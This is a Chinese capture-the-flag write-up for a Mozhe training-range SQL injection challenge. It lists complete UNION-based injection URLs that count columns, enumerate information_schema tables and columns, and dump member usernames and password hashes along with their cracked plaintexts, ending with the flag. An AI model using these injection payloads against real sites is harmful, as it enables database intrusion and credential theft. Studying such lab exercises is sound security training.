链接: https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe
1.判断是否存在爆破点:
http://124.70.64.48:46855/new_list.php?id=1dfddsvs
返回错误,id后的输入数据被处理,表示存在注入点
2.猜解列名数量(猜字段): order by x 错误与正常的过渡值
http://124.70.64.48:46855/new_list.php?id=1 order by 4
3.查找注入通道:
http://124.70.64.48:46855/new_list.php?id=-1%20union%20select%201,2,3,4
返回值为2,3(可注入通道)
4.查询数据库的用户名,版本,名字,系统:
user() root@localhost
version() 5.7.22-0ubuntu0.16.04.1
database() mozhe_Discuz_StormGroup
@@version_compile_os Linux
扩展:
数据库版本在5.0以上算高版本,采用information_schema有据查询,低版本采用暴力查询
原因:版本在5.0以上的数据库存在一个数据库名为information_schema存储有数据库名,表名,列名
5.查询数据库下的所有表名:
http://124.70.64.48:46855/new_list.php?id=-1%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=%27mozhe_Discuz_StormGroup%27
结果:StormGroup_member,notice
6.查询StormGroup_member表名下的所有列名:
http://124.70.64.48:46855/new_list.php?id=-1%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%27StormGroup_member%27
结果:id,name,password,status
7.查询StormGroup_member表名下的具体数据:
http://124.70.64.48:46855/new_list.php?id=-1%20union%20select%201,name,password,4%20from%20StormGroup_member%20limit%200,1
结果:mozhe 356f589a7df439f6f744ff19bb8092c0(解密得:dsan13)
http://124.70.64.48:46855/new_list.php?id=-1%20union%20select%201,name,password,4%20from%20StormGroup_member%20limit%201,1
结果;mozhe 0b3f116b287a258c0c75d8c5a3849fb3(解密得:844201)
8.尝试两个账户,得出flag
mozhe4f4b6c8f3a81a57fdb361d321d0
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)